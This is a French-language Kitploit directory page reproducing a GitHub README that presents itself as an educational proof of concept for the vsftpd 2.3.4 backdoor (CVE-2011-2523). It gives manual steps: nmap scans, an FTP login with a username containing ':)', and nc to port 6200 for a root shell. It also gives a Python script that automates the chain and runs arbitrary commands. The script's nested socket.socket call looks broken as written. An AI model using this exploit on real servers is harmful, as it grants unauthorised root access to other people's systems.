Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
vsftpd-2.3.4---Backdoor-Command-Execution — vsftpd 2.3.4 (CVE-2011-2523) une vulnérabilité critique qui mène à un Reverse Root Shell. Dans ce dépôt, je vais faire un PoC sur comment l'exploiter étape par étape, manuellement et automatiquement (Python) à des fins éducatives. | Kitploit
Outils/GitHubGitHub/tshaq17/vsftpd-2.3.4---backdoor-command-execution
Génération de PayloadsAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubtshaq17/vsftpd-2.3.4---backdoor-command-execution

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) une vulnérabilité critique qui mène à un Reverse Root Shell. Dans ce dépôt, je vais faire un PoC sur comment l'exploiter étape par étape, manuellement et automatiquement (Python) à des fins éducatives.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 6 moisPas encore vérifié

vsftpd-2.3.4---Exécution-de-commande-par-porte-dérobée

vsftpd 2.3.4 (CVE-2011-2523) est une vulnérabilité critique qui mène à un Root Shell. Dans ce dépôt, je vais faire une Preuve de Concept (PoC) de comment l'exploiter étape par étape, Manuellement & Automatiquement (Python) à des fins éducatives.

En quoi consiste la vulnérabilité ? Tout d'abord, c'est une exploitation côté service, donc nous l'exploiterons à distance. L'idée est que lorsque vous vous connectez au service FTP par défaut sur le port 21 en utilisant un nom d'utilisateur contenant :), cela déclenche l'ouverture d'un port TCP 6200 avec un Root Shell, afin que quiconque puisse s'y connecter et avoir un accès Root au serveur cible, ce qui est une catastrophe. Alors, faisons-le pratiquement étape par étape. Je vais l'expliquer d'abord manuellement pour avoir une idée complète, puis il y a un script Python pour l'exploiter automatiquement.

Manuellement

Scan de ports

  1. port 21 ouvert
root@kitploit:~
nmap -p21 -sV -sC -O Target_IP 
image
  1. port 6200 fermé
root@kitploit:~
nmap -p6200 Target_IP
  • Le port 6200 est fermé pour l'instant image

Exploitation

  1. Connectez-vous au service FTP et utilisez un nom d'utilisateur malveillant pour déclencher l'ouverture du port 6200
root@kitploit:~
ftp Target_IP 
  • Nom d'utilisateur : n'importe quoi:)
  • Mot de passe : n'importe quoi image
  1. Vérifiez le port 6200 après la connexion FTP
root@kitploit:~
nmap -p6200 Target_IP

Le port 6200 est maintenant ouvert, c'est donc notre porte dérobée

image
  1. Connectez-vous au port 6200 pour obtenir un Root Shell sur l'ensemble du serveur
root@kitploit:~
nc -nv Target_IP 6200

Enfin, nous avons un Root Shell sur la machine cible. image


Automatiquement

Après l'avoir fait manuellement, nous connaissons les étapes de l'exploit :

  1. Connectez-vous au serveur FTP sur le port (21).
  2. Utilisez un nom d'utilisateur contenant :) pour déclencher la porte dérobée.
  3. connectez-vous au port (6200).
root@kitploit:~
#!/usr/bin/python3 

from ftplib import FTP
import socket
import sys
import time

Target_IP = sys.argv[1]
cmd = sys.argv[2]

# Step1: Connect to FTP
try:
  ftp = FTP(Target_IP,timeout=2)
  ftp.login("user:)","password") # Step2: Send the malicious username
except:
  pass

time.sleep(1) # To give a time for the server to open the port (6200)

#Step3: Connect to port (6200) to have a Root Shell
shell = socket.socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
try:
  shell.connect((Target_IP,6200))
except:
  print("Shell Failed")

#Execute the commands
shell.send(cmd.encode() + b"\n")
print(shell.recv(4096).decode())

#Finally close the connection
shell.close()
Télécharger l’outil